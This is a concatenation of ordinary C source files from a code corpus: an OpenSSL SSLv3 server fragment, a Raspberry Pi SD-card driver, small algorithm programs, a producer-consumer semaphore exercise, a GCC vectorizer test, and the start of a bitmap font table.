= BUF_MEM_grow(buf, (n + 4) + kn); if (! tmp___4) { ERR_put_error(20, 155, 7, (char const *)"s3_srvr.c", 1147); goto err; } d = (unsigned char *)(s->init_buf)->data; p = d + 4; i = 0; while ((unsigned long )r[i] != (unsigned long )((void *)0)) { (*(p + 0)) = (unsigned char )((nr[i] >> 8) & 255); (*(p + 1)) = (unsigned char )(nr[i] & 255); p += 2; BN_bn2bin((BIGNUM const *)r[i], p); p += nr[i]; i ++; } if ((unsigned long )pkey != (unsigned long )((void *)0)) { if (pkey->type == 6) { q = md_buf; j = 0; num = 2; while (num > 0) { if (num == 2) { tmp___5 = (s->ctx)->md5; } else { tmp___5 = (s->ctx)->sha1; } EVP_DigestInit(& md_ctx, tmp___5); EVP_DigestUpdate(& md_ctx, (void const *)(& (s->s3)->client_random[0]), 32U); EVP_DigestUpdate(& md_ctx, (void const *)(& (s->s3)->server_random[0]), 32U); EVP_DigestUpdate(& md_ctx, (void const *)(d + 4), (unsigned int )n); EVP_DigestFinal(& md_ctx, q, (unsigned int *)(& i)); q += i; j += i; num --; } tmp___6 = RSA_sign(114, md_buf, (unsigned int )j, p + 2, & u, pkey->pkey.rsa); if (tmp___6 <= 0) { ERR_put_error(20, 155, 4, (char const *)"s3_srvr.c", 1185); goto err; } (*(p + 0)) = (unsigned char )((u >> 8) & 255U); (*(p + 1)) = (unsigned char )(u & 255U); p += 2; n = (int )((unsigned int )n + (u + 2U)); } else { if (pkey->type == 116) { tmp___7 = (EVP_MD const *)EVP_dss1(); EVP_DigestInit(& md_ctx, tmp___7); EVP_DigestUpdate(& md_ctx, (void const *)(& (s->s3)->client_random[0]), 32U); EVP_DigestUpdate(& md_ctx, (void const *)(& (s->s3)->server_random[0]), 32U); EVP_DigestUpdate(& md_ctx, (void const *)(d + 4), (unsigned int )n); tmp___8 = EVP_SignFinal(& md_ctx, p + 2, (unsigned int *)(& i), pkey); if (! tmp___8) { ERR_put_error(20, 155, 10, (char const *)"s3_srvr.c", 1204); goto err; } (*(p + 0)) = (unsigned char )((i >> 8) & 255); (*(p + 1)) = (unsigned char )(i & 255); p += 2; n += i + 2; } else { al = 40; ERR_put_error(20, 155, 251, (char const *)"s3_srvr.c", 1215); goto f_err; } } } tmp___9 = d; d ++; (*tmp___9) = 12; (*(d + 0)) = (unsigned char )((n >> 16) & 255); (*(d + 1)) = (unsigned char )((n >> 8) & 255); (*(d + 2)) = (unsigned char )(n & 255); d += 3; s->init_num = n + 4; s->init_off = 0; } s->state = 8529; tmp___10 = ssl3_do_write(s, 22); return (tmp___10); f_err: ssl3_send_alert(s, 2, al); err: return (-1); } }static int ssl3_send_certificate_request(SSL *s ) { unsigned char *p ; unsigned char *d ; int i ; int j ; int nl ; int off ; int n ; STACK *sk ; X509_NAME *name ; BUF_MEM *buf ; int tmp___0 ; int tmp___1 ; unsigned char *tmp___2 ; unsigned char *tmp___3 ; unsigned char *tmp___4 ; unsigned char *tmp___5 ; unsigned char *tmp___6 ; int tmp___7 ; { sk = (STACK *)((void *)0); if (s->state == 8544) { buf = s->init_buf; p = (unsigned char *)(buf->data + 4); d = p; p ++; n = ssl3_get_req_cert_type(s, p); (*(d + 0)) = (unsigned char )n; p += n; n ++; off = n; p += 2; n += 2; sk = SSL_get_client_CA_list(s); nl = 0; if ((unsigned long )sk != (unsigned long )((void *)0)) { i = 0; while (1) { tmp___1 = sk_num((STACK const *)sk); if (! (i < tmp___1)) { break; } name = (X509_NAME *)sk_value((STACK const *)sk, i); j = i2d_X509_NAME(name, (unsigned char **)((void *)0)); tmp___0 = BUF_MEM_grow(buf, ((4 + n) + j) + 2); if (! tmp___0) { ERR_put_error(20, 150, 7, (char const *)"s3_srvr.c", 1272); goto err; } p = (unsigned char *)(buf->data + (4 + n)); if (s->options & 536870912UL) { d = p; i2d_X509_NAME(name, & p); j -= 2; (*(d + 0)) = (unsigned char )((j >> 8) & 255); (*(d + 1)) = (unsigned char )(j & 255); d += 2; j += 2; n += j; nl += j; } else { (*(p + 0)) = (unsigned char )((j >> 8) & 255); (*(p + 1)) = (unsigned char )(j & 255); p += 2; i2d_X509_NAME(name, & p); n += 2 + j; nl += 2 + j; } i ++; } } p = (unsigned char *)(buf->data + (4 + off)); (*(p + 0)) = (unsigned char )((nl >> 8) & 255); (*(p + 1)) = (unsigned char )(nl & 255); p += 2; d = (unsigned char *)buf->data; tmp___2 = d; d ++; (*tmp___2) = 13; (*(d + 0)) = (unsigned char )((n >> 16) & 255); (*(d + 1)) = (unsigned char )((n >> 8) & 255); (*(d + 2)) = (unsigned char )(n & 255); d += 3; s->init_num = n + 4; s->init_off = 0; p = (unsigned char *)(s->init_buf)->data + s->init_num; tmp___3 = p; p ++; (*tmp___3) = 14; tmp___4 = p; p ++; (*tmp___4) = 0; tmp___5 = p; p ++; (*tmp___5) = 0; tmp___6 = p; p ++; (*tmp___6) = 0; s->init_num += 4; } tmp___7 = ssl3_do_write(s, 22); return (tmp___7); err: return (-1); } }static int ssl3_get_client_key_exchange(SSL *s ) { int i ; int al ; int ok ; long n ; unsigned long l ; unsigned char *p ; RSA *rsa ; EVP_PKEY *pkey ; BIGNUM *pub ; DH *dh_srvr ; { rsa = (RSA *)((void *)0); pkey = (EVP_PKEY *)((void *)0); pub = (BIGNUM *)((void *)0); n = ssl3_get_message(s, 8592, 8593, 16, 2048L, & ok); if (! ok) { return ((int )n); } p = (unsigned char *)(s->init_buf)->data; l = ((s->s3)->tmp.new_cipher)->algorithms; if (l & 1UL) { if ((s->s3)->tmp.use_rsa_tmp) { if ((unsigned long )s->cert != (unsigned long )((void *)0)) { if ((unsigned long )(s->cert)->rsa_tmp != (unsigned long )((void *)0)) { rsa = (s->cert)->rsa_tmp; } } if ((unsigned long )rsa == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 139, 173, (char const *)"s3_srvr.c", 1365); goto f_err; } } else { pkey = (s->cert)->pkeys[0].privatekey; if ((unsigned long )pkey == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 139, 168, (char const *)"s3_srvr.c", 1378); goto f_err; } else { if (pkey->type != 6) { al = 40; ERR_put_error(20, 139, 168, (char const *)"s3_srvr.c", 1378); goto f_err; } else { if ((unsigned long )pkey->pkey.rsa == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 139, 168, (char const *)"s3_srvr.c", 1378); goto f_err; } } } rsa = pkey->pkey.rsa; } if (s->version > 768) { i = (int )(((unsigned int )(*(p + 0)) << 8) | (unsigned int )(*(p + 1))); p += 2; if (n != (long )(i + 2)) { if (s->options & 256UL) { p -= 2; } else { ERR_put_error(20, 139, 234, (char const *)"s3_srvr.c", 1392); goto err; } } else { n = (long )i; } } i = RSA_private_decrypt((int )n, p, p, rsa, 1); al = -1; if (i != 48) { al = 50; ERR_put_error(20, 139, 118, (char const *)"s3_srvr.c", 1409); } if (al == -1) { if ((int )(*(p + 0)) == s->client_version >> 8) { if (! ((int )(*(p + 1)) == (s->client_version & 255))) { goto _L; } } else { _L: if (s->options & 1024UL) { if ((int )(*(p + 0)) == s->version >> 8) { if (! ((int )(*(p + 1)) == (s->version & 255))) { al = 50; ERR_put_error(20, 139, 116, (char const *)"s3_srvr.c", 1425); goto f_err; } } else { al = 50; ERR_put_error(20, 139, 116, (char const *)"s3_srvr.c", 1425); goto f_err; } } else { al = 50; ERR_put_error(20, 139, 116, (char const *)"s3_srvr.c", 1425); goto f_err; } } } if (al != -1) { ERR_clear_error(); i = 48; (*(p + 0)) = (unsigned char )(s->client_version >> 8); (*(p + 1)) = (unsigned char )(s->client_version & 255); RAND_pseudo_bytes(p + 2, i - 2); } (s->session)->master_key_length = ((*(((s->method)->ssl3_enc)->generate_master_secret)))(s, (s->session)->master_key, p, i); memset((void *)p, 0, (unsigned int )i); } else { if (l & 22UL) { i = (int )(((unsigned int )(*(p + 0)) << 8) | (unsigned int )(*(p + 1))); p += 2; if (n != (long )(i + 2)) { if (s->options & 128UL) { p -= 2; i = (int )n; } else { ERR_put_error(20, 139, 148, (char const *)"s3_srvr.c", 1467); goto err; } } if (n == 0L) { al = 40; ERR_put_error(20, 139, 236, (char const *)"s3_srvr.c", 1480); goto f_err; } else { if ((unsigned long )(s->s3)->tmp.dh == (unsigned long )((void *)0)) { al = 40; ERR_put_error(20, 139, 171, (char const *)"s3_srvr.c", 1488); goto f_err; } else { dh_srvr = (s->s3)->tmp.dh; } } pub = BN_bin2bn((unsigned char const *)p, i, (BIGNUM *)((void *)0)); if ((unsigned long )pub == (unsigned long )((void *)0)) { ERR_put_error(20, 139, 130, (char const *)"s3_srvr.c", 1498); goto err; } i = DH_compute_key(p, pub, dh_srvr); if (i <= 0) { ERR_put_error(20, 139, 5, (char const *)"s3_srvr.c", 1506); goto err; } DH_free((s->s3)->tmp.dh); (s->s3)->tmp.dh = (DH *)((void *)0); BN_clear_free(pub); pub = (BIGNUM *)((void *)0); (s->session)->master_key_length = ((*(((s->method)->ssl3_enc)->generate_master_secret)))(s, (s->session)->master_key, p, i); memset((void *)p, 0, (unsigned int )i); } else { al = 40; ERR_put_error(20, 139, 249, (char const *)"s3_srvr.c", 1524); goto f_err; } } return (1); f_err: ssl3_send_alert(s, 2, al); err: return (-1); } }static int ssl3_get_cert_verify(SSL *s ) { EVP_PKEY *pkey ; unsigned char *p ; int al ; int ok ; int ret ; long n ; int type ; int i ; int j ; X509 *peer ; { pkey = (EVP_PKEY *)((void *)0); ret = 0; type = 0; n = ssl3_get_message(s, 8608, 8609, -1, 512L, & ok); if (! ok) { return ((int )n); } if ((unsigned long )(s->session)->peer != (unsigned long )((void *)0)) { peer = (s->session)->peer; pkey = X509_get_pubkey(peer); type = X509_certificate_type(peer, pkey); } else { peer = (X509 *)((void *)0); pkey = (EVP_PKEY *)((void *)0); } if ((s->s3)->tmp.message_type != 15) { (s->s3)->tmp.reuse_message = 1; if ((unsigned long )peer != (unsigned long )((void *)0)) { if (type | 16) { al = 10; ERR_put_error(20, 136, 174, (char const *)"s3_srvr.c", 1573); goto f_err; } } ret = 1; goto end; } if ((unsigned long )peer == (unsigned long )((void *)0)) { ERR_put_error(20, 136, 186, (char const *)"s3_srvr.c", 1582); al = 10; goto f_err; } if (! (type & 16)) { ERR_put_error(20, 136, 220, (char const *)"s3_srvr.c", 1589); al = 47; goto f_err; } if ((s->s3)->change_cipher_spec) { ERR_put_error(20, 136, 133, (char const *)"s3_srvr.c", 1596); al = 10; goto f_err; } p = (unsigned char *)(s->init_buf)->data; i = (int )(((unsigned int )(*(p + 0)) << 8) | (unsigned int )(*(p + 1))); p += 2; n -= 2L; if ((long )i > n) { ERR_put_error(20, 136, 159, (char const *)"s3_srvr.c", 1607); al = 50; goto f_err; } j = EVP_PKEY_size(pkey); if (i > j) { ERR_put_error(20, 136, 265, (char const *)"s3_srvr.c", 1615); al = 50; goto f_err; } else { if (n > (long )j) { ERR_put_error(20, 136, 265, (char const *)"s3_srvr.c", 1615); al = 50; goto f_err; } else { if (n <= 0L) { ERR_put_error(20, 136, 265, (char const *)"s3_srvr.c", 1615); al = 50; goto f_err; } } } if (pkey->type == 6) { i = RSA_verify(114, (s->s3)->tmp.cert_verify_md, 36U, p, (unsigned int )i, pkey->pkey.rsa); if (i < 0) { al = 51; ERR_put_error(20, 136, 118, (char const *)"s3_srvr.c", 1629); goto f_err; } if (i == 0) { al = 51; ERR_put_error(20, 136, 122, (char const *)"s3_srvr.c", 1635); goto f_err; } } else { if (pkey->type == 116) { j = DSA_verify(pkey->save_type, (unsigned char const *)(& (s->s3)->tmp.cert_verify_md[16]), 20, p, i, pkey->pkey.dsa); if (j <= 0) { al = 51; ERR_put_error(20, 136, 112, (char const *)"s3_srvr.c", 1651); goto f_err; } } else { ERR_put_error(20, 136, 157, (char const *)"s3_srvr.c", 1658); al = 43; goto f_err; } } ret = 1; if (0) { f_err: ssl3_send_alert(s, 2, al); } end: EVP_PKEY_free(pkey); return (ret); } }static int ssl3_get_client_certificate(SSL *s ) { int i ; int ok ; int al ; int ret ; X509 *x ; unsigned long l ; unsigned long nc ; unsigned long llen ; unsigned long n ; unsigned char *p ; unsigned char *d ; unsigned char *q ; STACK *sk ; int tmp ; int tmp___0 ; { ret = -1; x = (X509 *)((void *)0); sk = (STACK *)((void *)0); n = (unsigned long )ssl3_get_message(s, 8576, 8577, -1, 102400L, & ok); if (! ok) { return ((int )n); } if ((s->s3)->tmp.message_type == 16) { if (s->verify_mode & 1) { if (s->verify_mode & 2) { ERR_put_error(20, 137, 199, (char const *)"s3_srvr.c", 1701); al = 40; goto f_err; } } if (s->version > 768) { if ((s->s3)->tmp.cert_request) { ERR_put_error(20, 137, 233, (char const *)"s3_srvr.c", 1708); al = 10; goto f_err; } } (s->s3)->tmp.reuse_message = 1; return (1); } if ((s->s3)->tmp.message_type != 11) { al = 10; ERR_put_error(20, 137, 262, (char const *)"s3_srvr.c", 1719); goto f_err; } p = (unsigned char *)(s->init_buf)->data; d = p; sk = sk_new_null(); if ((unsigned long )sk == (unsigned long )((void *)0)) { ERR_put_error(20, 137, 33, (char const *)"s3_srvr.c", 1726); goto err; } llen = (((unsigned long )(*(p + 0)) << 16) | ((unsigned long )(*(p + 1)) << 8)) | (unsigned long )(*(p + 2)); p += 3; if (llen + 3UL != n) { al = 50; ERR_put_error(20, 137, 159, (char const *)"s3_srvr.c", 1734); goto f_err; } nc = 0UL; while (nc < llen) { l = (((unsigned long )(*(p + 0)) << 16) | ((unsigned long )(*(p + 1)) << 8)) | (unsigned long )(*(p + 2)); p += 3; if ((l + nc) + 3UL > llen) { al = 50; ERR_put_error(20, 137, 135, (char const *)"s3_srvr.c", 1743); goto f_err; } q = p; x = d2i_X509((X509 **)((void *)0), & p, (long )l); if ((unsigned long )x == (unsigned long )((void *)0)) { ERR_put_error(20, 137, 13, (char const *)"s3_srvr.c", 1751); goto err; } if ((unsigned long )p != (unsigned long )(q + l)) { al = 50; ERR_put_error(20, 137, 135, (char const *)"s3_srvr.c", 1757); goto f_err; } tmp = sk_push(sk, (char *)x); if (! tmp) { ERR_put_error(20, 137, 33, (char const *)"s3_srvr.c", 1762); goto err; } x = (X509 *)((void *)0); nc += l + 3UL; } tmp___0 = sk_num((STACK const *)sk); if (tmp___0 <= 0) { if (s->version == 768) { al = 40; ERR_put_error(20, 137, 176, (char const *)"s3_srvr.c", 1775); goto f_err; } else { if (s->verify_mode & 1) { if (s->verify_mode & 2) { ERR_put_error(20, 137, 199, (char const *)"s3_srvr.c", 1782); al = 40; goto f_err; } } } } else { i = ssl_verify_cert_chain(s, sk); if (! i) { al = ssl_verify_alarm_type(s->verify_result); ERR_put_error(20, 137, 178, (char const *)"s3_srvr.c", 1793); goto f_err; } } if ((unsigned long )(s->session)->peer != (unsigned long )((void *)0)) { X509_free((s->session)->peer); } (s->session)->peer = (X509 *)sk_shift(sk); (s->session)->verify_result = s->verify_result; if ((unsigned long )(s->session)->sess_cert == (unsigned long )((void *)0)) { (s->session)->sess_cert = ssl_sess_cert_new(); if ((unsigned long )(s->session)->sess_cert == (unsigned long )((void *)0)) { ERR_put_error(20, 137, 33, (char const *)"s3_srvr.c", 1810); goto err; } } if ((unsigned long )((s->session)->sess_cert)->cert_chain != (unsigned long )((void *)0)) { sk_pop_free(((s->session)->sess_cert)->cert_chain, (void (*)(void * ))(& X509_free)); } ((s->session)->sess_cert)->cert_chain = sk; sk = (STACK *)((void *)0); ret = 1; if (0) { f_err: ssl3_send_alert(s, 2, al); } err: if ((unsigned long )x != (unsigned long )((void *)0)) { X509_free(x); } if ((unsigned long )sk != (unsigned long )((void *)0)) { sk_pop_free(sk, (void (*)(void * ))(& X509_free)); } return (ret); } }int ssl3_send_server_certificate(SSL *s ) { unsigned long l ; X509 *x ; int tmp ; { if (s->state == 8512) { x = ssl_get_server_send_cert(s); if ((unsigned long )x == (unsigned long )((void *)0)) { ERR_put_error(20, 154, 157, (char const *)"s3_srvr.c", 1844); return (0); } l = ssl3_output_cert_chain(s, x); s->state = 8513; s->init_num = (int )l; s->init_off = 0; } tmp = ssl3_do_write(s, 22); return (tmp); } }
the_stack_data/9513538.c
#include<stdio.h> int main() { int l,r,i,j,m=0; scanf("%d%d",&l,&r); for(i=l;i<r;++i) for(j=i+1;j<=r;++j) if((i^j)>m) m=i^j; printf("%d\n",m); return 0; }
the_stack_data/86204.c
// mmio // #define KVA 0xffff000000000000 // #define MMIO_BASE (KVA + 0x3f000000) #define MMIO_BASE 0x3F000000 // SD card command #define GO_IDLE_STATE 0 #define SEND_OP_CMD 1 #define ALL_SEND_CID 2 #define SEND_RELATIVE_ADDR 3 #define SELECT_CARD 7 #define SEND_IF_COND 8 #define VOLTAGE_CHECK_PATTERN 0x1aa #define STOP_TRANSMISSION 12 #define SET_BLOCKLEN 16 #define READ_SINGLE_BLOCK 17 #define WRITE_SINGLE_BLOCK 24 #define SD_APP_OP_COND 41 #define SDCARD_3_3V (1 << 21) #define SDCARD_ISHCS (1 << 30) #define SDCARD_READY (1 << 31) #define APP_CMD 55 // gpio #define GPIO_BASE (MMIO_BASE + 0x200000) #define GPIO_GPFSEL4 (GPIO_BASE + 0x10) #define GPIO_GPFSEL5 (GPIO_BASE + 0x14) #define GPIO_GPPUD (GPIO_BASE + 0x94) #define GPIO_GPPUDCLK1 (GPIO_BASE + 0x9c) // sdhost #define SDHOST_BASE (MMIO_BASE + 0x202000) #define SDHOST_CMD (SDHOST_BASE + 0) #define SDHOST_READ 0x40 #define SDHOST_WRITE 0x80 #define SDHOST_LONG_RESPONSE 0x200 #define SDHOST_NO_REPONSE 0x400 #define SDHOST_BUSY 0x800 #define SDHOST_NEW_CMD 0x8000 #define SDHOST_ARG (SDHOST_BASE + 0x4) #define SDHOST_TOUT (SDHOST_BASE + 0x8) #define SDHOST_TOUT_DEFAULT 0xf00000 #define SDHOST_CDIV (SDHOST_BASE + 0xc) #define SDHOST_CDIV_MAXDIV 0x7ff #define SDHOST_CDIV_DEFAULT 0x148 #define SDHOST_RESP0 (SDHOST_BASE + 0x10) #define SDHOST_RESP1 (SDHOST_BASE + 0x14) #define SDHOST_RESP2 (SDHOST_BASE + 0x18) #define SDHOST_RESP3 (SDHOST_BASE + 0x1c) #define SDHOST_HSTS (SDHOST_BASE + 0x20) #define SDHOST_HSTS_MASK (0x7f8) #define SDHOST_HSTS_ERR_MASK (0xf8) #define SDHOST_HSTS_DATA (1 << 0) #define SDHOST_PWR (SDHOST_BASE + 0x30) #define SDHOST_DBG (SDHOST_BASE + 0x34) #define SDHOST_DBG_FSM_DATA 1 #define SDHOST_DBG_FSM_MASK 0xf #define SDHOST_DBG_MASK (0x1f << 14 | 0x1f << 9) #define SDHOST_DBG_FIFO (0x4 << 14 | 0x4 << 9) #define SDHOST_CFG (SDHOST_BASE + 0x38) #define SDHOST_CFG_DATA_EN (1 << 4) #define SDHOST_CFG_SLOW (1 << 3) #define SDHOST_CFG_INTBUS (1 << 1) #define SDHOST_SIZE (SDHOST_BASE + 0x3c) #define SDHOST_DATA (SDHOST_BASE + 0x40) #define SDHOST_CNT (SDHOST_BASE + 0x50) // helper #define set(io_addr, val) \ asm volatile("str %w1, [%0]" ::"r"(io_addr), "r"(val) : "memory"); #define get(io_addr, val) \ asm volatile("ldr %w0, [%1]" : "=r"(val) : "r"(io_addr) : "memory"); static inline void delay(unsigned long tick) { while (tick--) { asm volatile("nop"); } } static int is_hcs; // high capcacity(SDHC) static void pin_setup() { set(GPIO_GPFSEL4, 0x24000000); set(GPIO_GPFSEL5, 0x924); set(GPIO_GPPUD, 0); delay(15000); set(GPIO_GPPUDCLK1, 0xffffffff); delay(15000); set(GPIO_GPPUDCLK1, 0); } static void sdhost_setup() { unsigned int tmp; set(SDHOST_PWR, 0); set(SDHOST_CMD, 0); set(SDHOST_ARG, 0); set(SDHOST_TOUT, SDHOST_TOUT_DEFAULT); set(SDHOST_CDIV, 0); set(SDHOST_HSTS, SDHOST_HSTS_MASK); set(SDHOST_CFG, 0); set(SDHOST_CNT, 0); set(SDHOST_SIZE, 0); get(SDHOST_DBG, tmp); tmp &= ~SDHOST_DBG_MASK; tmp |= SDHOST_DBG_FIFO; set(SDHOST_DBG, tmp); delay(250000); set(SDHOST_PWR, 1); delay(250000); set(SDHOST_CFG, SDHOST_CFG_SLOW | SDHOST_CFG_INTBUS | SDHOST_CFG_DATA_EN); set(SDHOST_CDIV, SDHOST_CDIV_DEFAULT); } static int wait_sd() { int cnt = 1000000; unsigned int cmd; do { if (cnt == 0) { return -1; } get(SDHOST_CMD, cmd); --cnt; } while (cmd & SDHOST_NEW_CMD); return 0; } static int sd_cmd(unsigned cmd, unsigned int arg) { set(SDHOST_ARG, arg); set(SDHOST_CMD, cmd | SDHOST_NEW_CMD); return wait_sd(); } static int sdcard_setup() { unsigned int tmp; sd_cmd(GO_IDLE_STATE | SDHOST_NO_REPONSE, 0); sd_cmd(SEND_IF_COND, VOLTAGE_CHECK_PATTERN); get(SDHOST_RESP0, tmp); if (tmp != VOLTAGE_CHECK_PATTERN) { return -1; } while (1) { if (sd_cmd(APP_CMD, 0) == -1) { // MMC card or invalid card status // currently not support continue; } sd_cmd(SD_APP_OP_COND, SDCARD_3_3V | SDCARD_ISHCS); get(SDHOST_RESP0, tmp); if (tmp & SDCARD_READY) { break; } delay(1000000); } is_hcs = tmp & SDCARD_ISHCS; sd_cmd(ALL_SEND_CID | SDHOST_LONG_RESPONSE, 0); sd_cmd(SEND_RELATIVE_ADDR, 0); get(SDHOST_RESP0, tmp); sd_cmd(SELECT_CARD, tmp); sd_cmd(SET_BLOCKLEN, 512); return 0; } static int wait_fifo() { int cnt = 1000000; unsigned int hsts; do { if (cnt == 0) { return -1; } get(SDHOST_HSTS, hsts); --cnt; } while ((hsts & SDHOST_HSTS_DATA) == 0); return 0; } static void set_block(int size, int cnt) { set(SDHOST_SIZE, size); set(SDHOST_CNT, cnt); } static void wait_finish() { unsigned int dbg; do { get(SDHOST_DBG, dbg); } while ((dbg & SDHOST_DBG_FSM_MASK) != SDHOST_HSTS_DATA); } void readblock(int block_idx, void* buf) { unsigned int* buf_u = (unsigned int*)buf; int succ = 0; if (!is_hcs) { block_idx <<= 9; } do{ set_block(512, 1); sd_cmd(READ_SINGLE_BLOCK | SDHOST_READ, block_idx); for (int i = 0; i < 128; ++i) { wait_fifo(); get(SDHOST_DATA, buf_u[i]); } unsigned int hsts; get(SDHOST_HSTS, hsts); if (hsts & SDHOST_HSTS_ERR_MASK) { set(SDHOST_HSTS, SDHOST_HSTS_ERR_MASK); sd_cmd(STOP_TRANSMISSION | SDHOST_BUSY, 0); } else { succ = 1; } } while(!succ); wait_finish(); } void writeblock(int block_idx, void* buf) { unsigned int* buf_u = (unsigned int*)buf; int succ = 0; if (!is_hcs) { block_idx <<= 9; } do{ set_block(512, 1); sd_cmd(WRITE_SINGLE_BLOCK | SDHOST_WRITE, block_idx); for (int i = 0; i < 128; ++i) { wait_fifo(); set(SDHOST_DATA, buf_u[i]); } unsigned int hsts; get(SDHOST_HSTS, hsts); if (hsts & SDHOST_HSTS_ERR_MASK) { set(SDHOST_HSTS, SDHOST_HSTS_ERR_MASK); sd_cmd(STOP_TRANSMISSION | SDHOST_BUSY, 0); } else { succ = 1; } } while(!succ); wait_finish(); } void sd_init() { pin_setup(); sdhost_setup(); sdcard_setup(); }
the_stack_data/168893642.c
#include <stdio.h> void swap(int *a, int *b) { int tmp; tmp = *a; *a = *b; *b = tmp; } void qs(int *arr, int left0, int right0) { int pivot = arr[right0]; //опорный элемент int left = left0; int right = right0; do { while (arr[left] < pivot) ++left; while (arr[right] > pivot) --right; if (left <= right) { swap(&arr[left], &arr[right]); ++left; --right; } } while (left <= right); if (right > left0) qs(arr, left0, right); if (left < right0) qs(arr, left, right0); } int quick_sort(int *arr, int arr_len) { int left = 0; int right = arr_len - 1; qs(arr, left, right); //левая и правая границы return 0; } //////////функции массива///////////////////// void print_arr(int *arr, int arr_len) { for(int i = 0; i < arr_len - 1; i++) { printf("%d ", arr[i]); } printf("%d\n", arr[arr_len-1]); } void push_arr(int *arr, int arr_len) { int elem; for(int i = 0; i < arr_len; i++) { scanf("%d", &elem); arr[i] = elem; } } int main(void) { int arr_len; scanf("%d", &arr_len); int arr[arr_len]; push_arr(arr, arr_len); quick_sort(arr, arr_len); print_arr(arr, arr_len); return 0; }
the_stack_data/789343.c
/* Copyright 2016 Rose-Hulman */ #include <stdio.h> #include <pthread.h> #include <semaphore.h> #include <unistd.h> /** In this system, there are 2 types of threads - producers and consumers. Producers write integers to the shared data buffer. Consumers read integers from the shared data buffer. Everybody has to be careful when modifying the buffer and the integer that keeps track of how many elements are in the buffer. When the producers are being slow (i.e. the buffer is empty) the consumers should be blocked by a semaphore. You can simulate this by uncommenting the sleep in the producer code. When the consumers are being slow (i.e. the buffer is full) the producers should be blocked by a semaphore. You can simulate this by uncommenting the sleep in the consumer code. It does not matter the order the items are consumed (i.e. it does not need to be the same as the order they were produced). Here's what I would suggest, attempt to figure it out and make a first stab at writing the code. Then, if you get stuck - check out the treatmeant in the little book of semaphores (pg 73): http://www.greenteapress.com/semaphores/ **/ #define BUFFERSIZE 5 int buffer[BUFFERSIZE]; int lastValidIndex; void *producer(void *arg) { /* you can ignore this linter error */ int i, value = *((int*) arg); /* I produce 10 values, then I stop */ for (i = 0; i < 10; i++) { buffer[lastValidIndex + 1] = value; lastValidIndex++; printf("Produced value %d, stored at %d\n", value, lastValidIndex); sleep(1); /* feel free to comment this out as part of your testing. I've left it in to make it obvious things are not working */ value = value + 1; } return NULL; } void *consumer(void *arg) { int value, i; /* I consume 10 values, then I stop */ for (i = 0; i < 10; i++) { // sleep(1); value = buffer[lastValidIndex]; lastValidIndex--; printf("Consumed value %d, stored at %d\n", value, lastValidIndex + 1); } return NULL; } int main(int argc, char **argv) { pthread_t p1, p2, c1, c2; int p1start = 100; int p2start = 200; lastValidIndex = -1; /* initially there is no valid data */ pthread_create(&p1, NULL, producer, &p1start); pthread_create(&p2, NULL, producer, &p2start); pthread_create(&c1, NULL, consumer, NULL); pthread_create(&c2, NULL, consumer, NULL); pthread_join(p1, NULL); pthread_join(p2, NULL); pthread_join(c1, NULL); pthread_join(c2, NULL); printf("Everything finished.\n"); }
the_stack_data/1231947.c
/* { dg-do compile } */ /* { dg-require-effective-target vect_int } */ #define N 320 #define M 1024 unsigned short in[N+M]; unsigned short coeff[M]; unsigned int out[N]; /* Outer-loop vectorization. */ void foo (){ int i,j; unsigned short diff; for (i = 0; i < N; i++) { diff = 0; for (j = 0; j < M; j+=8) { diff += in[j+i]*coeff[j]; } out[i]=diff; } } /* { dg-final { scan-tree-dump-times "OUTER LOOP VECTORIZED" 1 "vect" { target { vect_short_mult && { ! vect_no_align } } } } } */ /* { dg-final { scan-tree-dump-times "zero step in outer loop." 1 "vect" } } */
the_stack_data/41004.c
#include <stdio.h> long long nums[100000]; int main() { int m = 0, n = 0, i = 0, j = 0; scanf("%d%d", &n, &m); for (i = 0; i < n; i++) { scanf("%lld", &nums[i]); if (i > 0) nums[i] += nums[i-1]; } long long temp = 0, tempAdd = 0, sum = 0; int ope = 0, isneg = 1, a = 0, b = 0; for (i = 0; i < m; i++) { scanf("%d", &ope); switch (ope) { case 1: isneg = -isneg; temp = -temp; break; case 2: scanf("%lld", &tempAdd); temp += tempAdd; break; case 3: scanf("%d%d", &a, &b); if (a > 1) sum = (nums[b-1] - nums[a-2]) * isneg + (b-a+1) * temp; else sum = nums[b-1] * isneg + b * temp; printf("%lld\n", sum); sum = 0; } } return 0; }
the_stack_data/25138954.c
/* Fontname: -wenquanyi-wenquanyi bitmap song-medium-r-normal--15-150-75-75-P-80-iso10646-1 Copyright: (null) Glyphs: 4041/30127 BBX Build Mode: 0 */ #ifdef U8G2_USE_LARGE_FONTS const uint8_t u8g2_font_wqy15_t_gb2312a[147707] U8G2_FONT_SECTION("u8g2_font_wqy15_t_gb2312a") = "\311\0\3\2\4\5\5\5\5\21\21\376\374\13\375\14\374\1\332\3\342\6\213 \6\0`\274\0!\7\321" "\346\303x\22\42\10S\244\305H\274\4#\30\310\340\313\213\302(\214\242a\210\212Q\30\205Q\64\14Q" "\61\12\243\14$\27\327\340\303\13\7%\212\244H\12\223tM\302H\212\244\312 f\0%\26\271 \304" "\321\242^\262(\11\225\34\311\201H\213z\311\42U\1&\24\310 \314\32\263Ni\22\227\226R\222%" "\305(K\242-'\7Q\244\245\30\4(\14\4#\263\213jQ\326\217YX)\15\4#\263\10ka" "\326OYT\3*\20\227`\304+U\332\246a\210\266\244\251\226\1+\26\273 \344\315\261\34\313\261\34" "K\207\203\232c\71\226c\71\226\2,\10B\244\303\30\22\5-\7\24\340\254\30\2.\7\42\344\303\30" "\2/\17\6#\303-\246\305\264\230\26\323b\232\2\60\15\267 \304\332*\251_\223,\233\0\61\12\265" " \264\212\306\376\64\10\62\15\267 \304\332*i\234\366y\30\2\63\23\267 \304\31\242\60\7\342\64\333" "\201\34\210\305h\210\0\64\22\267 \304M\305$\213jQ\226\204\311\60\244q\5\65\20\267 \304\270\304" "-\223\226\3q,FC\4\66\20\267 \304\332*qe\322\222\324\232d\331\4\67\17\267 \304\70\304" "i\234\306i\234\306E\0\70\22\267 \304\332*\251\232d\331VI\325$\313&\0\71\20\267 \304\332" "*\251\65\311\244%\256d\331\4:\10r\42\244\30\342!;\12\222\242\243\30\342!Q\0<\20\251\344" "\343Gb\325\35\320!\35\322!\35\12=\12J\242\344x\310\311\303!>\21\251\342\343\310!\35\322!" "\35\322\1\325\71G\0\77\17\306\342\303\31\222PL\303j\235\226F\0@\33\271 \324\32\264\64\211&" "%K\244!Q\262D\311\22%J&-I\263A\2A\27\271 